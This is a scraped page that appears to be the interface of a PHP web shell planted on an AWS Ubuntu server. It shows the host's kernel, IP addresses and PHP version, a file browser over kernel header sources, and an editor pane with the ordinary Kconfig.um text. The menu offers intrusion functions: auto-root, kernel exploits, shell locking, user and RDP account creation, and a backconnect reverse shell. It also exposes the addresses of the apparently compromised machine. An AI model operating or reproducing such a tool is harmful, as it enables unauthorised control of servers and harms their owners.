Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.137.175.166
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-aws-headers-4.15.0-1021 /
arch /
um /
[ HOME SHELL ]
Name
Size
Permission
Action
drivers
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
kernel
[ DIR ]
drwxr-xr-x
os-Linux
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
Kconfig.char
4.46
KB
-rw-r--r--
Kconfig.common
823
B
-rw-r--r--
Kconfig.debug
1.01
KB
-rw-r--r--
Kconfig.net
8.49
KB
-rw-r--r--
Kconfig.rest
326
B
-rw-r--r--
Kconfig.um
4.07
KB
-rw-r--r--
Makefile
5.23
KB
-rw-r--r--
Makefile-os-Linux
235
B
-rw-r--r--
Makefile-skas
290
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Kconfig.um
# SPDX-License-Identifier: GPL-2.0 config STATIC_LINK bool "Force a static link" default n help This option gives you the ability to force a static link of UML. Normally, UML is linked as a shared binary. This is inconvenient for use in a chroot jail. So, if you intend to run UML inside a chroot, you probably want to say Y here. Additionally, this option enables using higher memory spaces (up to 2.75G) for UML. source "mm/Kconfig" config LD_SCRIPT_STATIC bool default y depends on STATIC_LINK config LD_SCRIPT_DYN bool default y depends on !LD_SCRIPT_STATIC select MODULE_REL_CRCS if MODVERSIONS source "fs/Kconfig.binfmt" config HOSTFS tristate "Host filesystem" help While the User-Mode Linux port uses its own root file system for booting and normal file access, this module lets the UML user access files stored on the host. It does not require any network connection between the Host and UML. An example use of this might be: mount none /tmp/fromhost -t hostfs -o /tmp/umlshare where /tmp/fromhost is an empty directory inside UML and /tmp/umlshare is a directory on the host with files the UML user wishes to access. For more information, see <http://user-mode-linux.sourceforge.net/hostfs.html>. If you'd like to be able to work with files stored on the host, say Y or M here; otherwise say N. config MCONSOLE bool "Management console" depends on PROC_FS default y help The user mode linux management console is a low-level interface to the kernel, somewhat like the i386 SysRq interface. Since there is a full-blown operating system running under every user mode linux instance, there is much greater flexibility possible than with the SysRq mechanism. If you answer 'Y' to this option, to use this feature, you need the mconsole client (called uml_mconsole) which is present in CVS in 2.4.5-9um and later (path /tools/mconsole), and is also in the distribution RPM package in 2.4.6 and later. It is safe to say 'Y' here. config MAGIC_SYSRQ bool "Magic SysRq key" depends on MCONSOLE help If you say Y here, you will have some control over the system even if the system crashes for example during kernel debugging (e.g., you will be able to flush the buffer cache to disk, reboot the system immediately or dump some status information). A key for each of the possible requests is provided. This is the feature normally accomplished by pressing a key while holding SysRq (Alt+PrintScreen). On UML, this is accomplished by sending a "sysrq" command with mconsole, followed by the letter for the requested command. The keys are documented in <file:Documentation/sysrq.txt>. Don't say Y unless you really know what this hack does. config KERNEL_STACK_ORDER int "Kernel stack size order" default 1 if 64BIT range 1 10 if 64BIT default 0 if !64BIT help This option determines the size of UML kernel stacks. They will be 1 << order pages. The default is OK unless you're running Valgrind on UML, in which case, set this to 3. config MMAPPER tristate "iomem emulation driver" help This driver allows a host file to be used as emulated IO memory inside UML. config NO_DMA def_bool y config PGTABLE_LEVELS int default 3 if 3_LEVEL_PGTABLES default 2 config SECCOMP def_bool y prompt "Enable seccomp to safely compute untrusted bytecode" ---help--- This kernel feature is useful for number crunching applications that may need to compute untrusted bytecode during their execution. By using pipes or other transports made available to the process as file descriptors supporting the read/write syscalls, it's possible to isolate those applications in their own address space using seccomp. Once seccomp is enabled via prctl(PR_SET_SECCOMP), it cannot be disabled and the task is only allowed to execute a few safe syscalls defined by each seccomp mode. If unsure, say Y.
Close